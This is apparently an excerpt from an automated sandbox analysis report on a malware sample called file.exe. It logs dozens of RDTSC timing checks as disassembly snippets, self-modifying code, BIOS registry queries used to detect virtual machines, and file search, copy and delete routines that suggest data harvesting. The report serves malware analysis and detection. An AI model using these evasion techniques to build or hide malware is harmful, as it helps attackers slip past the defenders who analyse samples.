              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F718D6 second address: F718ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E390E37F1h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F718ED second address: F71900 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E05Eh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7200C second address: F72013 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79FAE second address: F79FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79984 second address: F799A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E390E37EBh 0x00000009 pop esi 0x0000000a jo 00007F6E390E37ECh 0x00000010 jp 00007F6E390E37E6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F799A0 second address: F799CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E3947E05Ch 0x00000008 je 00007F6E3947E056h 0x0000000e jns 00007F6E3947E058h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6E3947E062h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F799CF second address: F799D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E390E37E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F864A4 second address: F864BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E3947E056h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f jbe 00007F6E3947E056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86625 second address: F8662B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B7AB second address: F8B7B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F95F38 second address: F95F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E390E37E6h 0x00000009 jmp 00007F6E390E37F0h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0F95 second address: FA0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0F9B second address: FA0FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E390E37E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F896 second address: F9F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6E3947E056h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F8A0 second address: F9F8AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E390E37E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FB70 second address: F9FB7C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E3947E056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FB7C second address: F9FB87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6E390E37E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE40 second address: F9FE4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E3947E056h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE4F second address: F9FE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FFE6 second address: F9FFF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FFF2 second address: FA0005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0153 second address: FA016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E063h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F19 second address: FA3F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6E390E37F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F31 second address: FA3F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F36 second address: FA3F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F3C second address: FA3F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F45 second address: FA3F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3F4B second address: FA3F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7B88 second address: FA7B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7CBD second address: FA7CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7CC1 second address: FA7CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007F6E390E37E6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB99B7 second address: FB99D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB99D1 second address: FB99D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB38EB second address: FB38FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E3947E05Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB38FC second address: FB3908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3908 second address: FB390C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4A25 second address: EC4A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37ECh 0x00000007 jmp 00007F6E390E37EDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F6E390E37EEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5ED1 second address: FC5EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6E3947E056h 0x0000000a jns 00007F6E3947E056h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5EE5 second address: FC5EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5AEE second address: FC5AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5C54 second address: FC5C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5C58 second address: FC5C7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E3947E062h 0x00000008 jno 00007F6E3947E056h 0x0000000e jnl 00007F6E3947E056h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d ja 00007F6E3947E056h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC760 second address: FDC771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jo 00007F6E390E37F9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB581 second address: FDB587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB587 second address: FDB593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F6E390E37E6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB593 second address: FDB597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB702 second address: FDB708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB708 second address: FDB721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB721 second address: FDB729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB8B2 second address: FDB8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA35 second address: FDBA63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F9h 0x00000007 jmp 00007F6E390E37F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC185 second address: FDC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC410 second address: FDC41C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6E390E37E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDEDE second address: FDDF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Fh 0x00000009 pop esi 0x0000000a jmp 00007F6E3947E061h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0D59 second address: FE0D6D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0D6D second address: FE0D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0D73 second address: FE0D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE22E3 second address: FE22FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E3947E056h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F6E3947E056h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE22FA second address: FE22FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56602B8 second address: 566033E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov ebx, 79AA9290h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6E3947E066h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F6E3947E060h 0x0000001a mov ebp, esp 0x0000001c jmp 00007F6E3947E060h 0x00000021 pop ebp 0x00000022 pushad 0x00000023 call 00007F6E3947E05Eh 0x00000028 mov ecx, 7FFD6481h 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F6E3947E05Dh 0x00000036 xor ecx, 1E0C47D6h 0x0000003c jmp 00007F6E3947E061h 0x00000041 popfd 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D4F883 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EFBAD1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-26849
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26921
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B13910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B13910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B12390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00B12390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B14B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B14B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00B1DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B1D530
